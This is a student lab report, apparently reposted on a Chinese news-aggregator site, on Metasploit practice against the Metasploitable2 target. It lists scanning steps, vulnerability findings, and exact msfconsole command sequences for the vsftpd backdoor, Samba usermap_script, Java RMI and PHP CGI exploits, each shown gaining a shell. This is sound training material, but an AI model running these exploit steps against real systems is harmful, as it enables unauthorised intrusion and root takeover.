当前位置: 首页 > news >正文

20232301 2025-2026-1 《网络与系统攻防技术》实验六实验报告

实验六 Metasploit攻击渗透实践

一、实验内容

掌握metasploit的用法。
下载官方靶机Metasploitable2,完成下面实验内容。

(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。

(2)攻击如下漏洞:
1.sftpd源码包后门漏洞(21端口)
2.SambaMS-RPC Shell命令注入漏洞(端口139)
3.Java RMI SERVER命令执行漏洞(1099端口)
4.PHP CGI参数执行注入漏洞(80端口)

2.实验过程

2.1前期渗透

2.1.1主机发现

使用ifconfig命令查看靶机ip,为192.168.67.130
image

kali中输入msfconsole进入metasploit
输入如下命令:

search arp_sweep  #搜索ARP扫描辅助模块
use 0 #使用第一个模块arp_sweep
set RHOSTS 192.168.67.0/24  #扫描虚拟机所在网段
run  #开始扫描

image
结果如下:
image
我们发现了刚刚安装的靶机的ip地址,也就是说明其在线,同时括号中标识标识为VMware, Inc.表示其为虚拟机

2.1.2端口扫描

(1)使用nmap
nmap -sS -sV 192.168.67.130
对靶机进行SYN端口扫描和版本探测
结果如下:
image
发现了大量端口
(2)使用Metasploit的Portscan模块实现同样功能
输入如下指令:

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.67.130
set THREADS 10   # 设置并发线程数,提升扫描速度
run

结果如下:
image
同样发现了大量端口
其中不乏一些存在漏洞的端口
例如
139 端口(NetBIOS):易遭爆破、SMB漏洞攻击,黑客可尝试爆破并入侵。
445 端口(SMB):存在 “永恒之蓝” 等漏洞,易被黑客利用传播勒索病毒。
3306 端口(MySQL):易受SQL注入、提权、爆破攻击,可能被黑客获取数据库控制权。

2.1.3漏洞扫描

输入
nmap -script=vuln 192.168.67.130进行漏洞扫描
image

发现了海量结果,我们逐一分析一下:
image
这是vsFTPd 2.3.4的后门漏洞,属于高危漏洞,攻击者可输入含 “😃” 的用户名和任意密码,触发漏洞后目标会开启 6200 后门端口,利用该漏洞直接获取目标主机root权限,完全控制服务器,存在文件篡改、数据窃取、植入恶意程序等严重风险

image
image
在25端口,存在如下漏洞:

  • SSL POODLE 漏洞,攻击者可通过中间人攻击利用 SSL3.0的CBC填充缺陷获取明文数据
  • 匿名Diffie-Hellman密钥交换中间人漏洞,使攻击者能主动篡改会话数据,破坏数据机密性和完整性
  • DHE_EXPORT降级漏洞,可让攻击者将 TLS 会话降级为 512 位加密,轻易破解加密流
  • Diffie-Hellman密钥交换组强度不足漏洞,可能会被破解

对于80端口(web服务):
image
image
存在如下漏洞:

  • Slowloris 拒绝服务漏洞(CVE-2007-6750),攻击者可通过保持大量不完整HTTP连接耗尽服务器资源,导致服务不可用
  • 多处SQL 注入漏洞,黑客可注入恶意 SQL 语句窃取数据库数据、篡改内容甚至获取服务器权限
  • CSRF 漏洞,攻击者可诱导用户在已登录状态下执行非本意操作,比如修改密码、提交恶意请求等

对于1099端口:
image
存在Java RMI注册表远程代码执行漏洞,涉及 1099/tcp端口的rmiregistry服务。这是由于RMI 注册表默认配置允许从远程URL加载类,攻击者可利用此特性注入恶意类,实现远程代码执行。

对于5432端口:
image
image
发现了SSL/TLS相关漏洞:

  • CCS注入漏洞
  • Diffie-Hellman密钥交换组强度不足
  • SSL POODLE信息泄露漏洞

对于6667端口(IRC服务):
image

存在UnrealIRCd IRC服务器后门漏洞,这个漏洞是UnrealIRCd被植入后门的版本,攻击者可通过特定指令直接获取服务器shell权限

对于8180端口(Web服务):
image
image
image

8180 端口存在以下漏洞:

  • Slowloris拒绝服务漏洞:攻击者可通过保持大量不完整 HTTP 连接,耗尽服务器资源,导致服务不可用。
  • JSESSIONID HttpOnly标志未设置:多个 /admin路径下的页面会话cookie未设置HttpOnly标志,易被XSS攻击窃取,进而导致会话劫持,攻击者可冒充管理员执行恶意操作。
  • 后台路径暴露:存在多个可能的/admin管理路径,增加了被暴力破解、路径遍历等攻击的风险。

再用Nessus扫一下:
image
image
结果差不多

2.2漏洞利用

2.2.1Vsftpd源码包后门漏洞(21端口)

进入Metasploit,输入如下命令:

use exploit/unix/ftp/vsftpd_234_backdoor  #使用对应漏洞
set RHOST 192.168.67.130 
exploit 

image
发现我们成功获取了主机shell,并且是root权限

2.2.2 SambaMS-RPC Shell命令注入漏洞(端口139)

指令:

use exploit/multi/samba/usermap_script 
set RHOST 192.168.67.130
exploit 

image
也是非常成功的获取到了shell

2.2.3 Java RMI SERVER命令执行漏洞(1099端口)

输入nmap -p 1099 192.168.67.130用于确认端口是否打开
image
(其实前边已经验证过了)

输入如下命令进行连接:

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.67.130
exploit  
shell 

image
连接成功后,输入shell就成功获取到了root权限的shell

2.2.4 PHP CGI参数执行注入漏洞(80端口)

输入命令:

use exploit/multi/http/php_cgi_arg_injection 
set RHOST 192.168.67.130
exploit 

image

获取shell成功,但是与前边获取到的root用户不同,这次获取到的用户是www-data,也就是 Linux系统中用于运行Web服务器的默认系统用户

3.问题与解决

本次实验还是非常顺利的,主要还是偏验证性实验,再加上靶机非常给力,所以没啥问题
51WA3_AX0AJ@DFO8LSKKFOA

4.感悟与思考

这次实验比起之前的实验的确轻松了不少,还让我有点不适应,主要是因为整体就是输指令-分析漏洞/验证权限,加上之前的实验已经把很多糟心的问题都排除掉了(比如说Reason:Died这种问题)所以很流畅。而且由于用的是官方提供的靶机,所以也比较好攻击,回想起来之前的实验一些靶机死活都攻击不成功,真是形成了鲜明对比,看来以后这些偏练习、验证性的实验可以现寻找一下有没有已经有预设好的靶机,这样可以少浪费很多时间。
之前我已经使用过了Metasploit,但是这次的一系列实验让我看到了,其对于各个存在的漏洞都有攻击方法。这让我对对这个工具的强大之处又有了更深的认识。
虽然实验做完了,但是最重要的实验要理解每条指令和输出结果的实际意义,才能真正将知识记到心里,总的来说,这次实验令我受益匪浅。

http://www.jsqmd.com/news/48192/

相关文章:

  • 增强AI股票预测分析报告 - 2025年11月23日
  • 2025年11月中国电动叉车销售公司评测榜:行业权威数据与选购指南
  • 2025年11月石墨电极厂家推荐排名:从生产技术到应用场景的深度比对
  • 高性能AI股票预测分析报告 - 2025年11月23日
  • 2025年11月石墨电极厂家评测榜:结合产能与创新能力的综合评估
  • PySpark - CountVectorizer
  • 2025.11.23笔记
  • Elasticsearch从入门到进阶——搜索优化原理 - 教程
  • AI股票预测分析报告 - 2025年11月23日
  • EDK II PCD的概念、类型、使用
  • 岛屿计数深度解析:DFS与BFS的联系、差异及实战选择
  • 实验3 熟悉常用的HBase操作
  • 实用指南:开源AI智能客服、AI智能名片与S2B2C商城小程序融合下的商家客服能力提升策略研究
  • 2025 靠谱白酒商标转让平台测评:资源量 + 过户效率 大比拼
  • 完整教程:[sam2图像分割] mask_decoder | TwoWayTransformer
  • 微内核安全设计原理详解
  • 2025国内隐形车衣品牌最新推荐——莱茵骑士,守护原厂漆,源头工厂实力出圈,国产汽车贴膜、汽车装饰贴纸首选服务商
  • 2025 大型正规商标转让平台测评:5 大头部平台资质、标源全对比
  • 完整教程:攻克兼容、安全、零中断的“不可能三角”:电科金仓异构多活架构交出集团化医院信创最佳答卷!
  • c语言完成队列【由浅入深-数据结构】
  • JS 特性 有哪些
  • 动态重定位技术
  • 2025年11月汽车车衣、贴膜贴纸最新源头厂商榜单推荐,抗暴、防紫外线、汽车装饰,优质品牌选择指南!
  • 2025汽车隐形车衣Top10品牌榜单,防爆膜、紫外线贴膜、装饰贴纸哪个厂家好?服务、品质、性价比选型指南。
  • 自动清理B站稍后再看列表
  • Gemini下载
  • 高斯约旦消元模版
  • 每日一练-ping返回数据解析-TTL
  • 完整教程:设计模式-备忘录模式(Memento)
  • SQL之表的增删 - 指南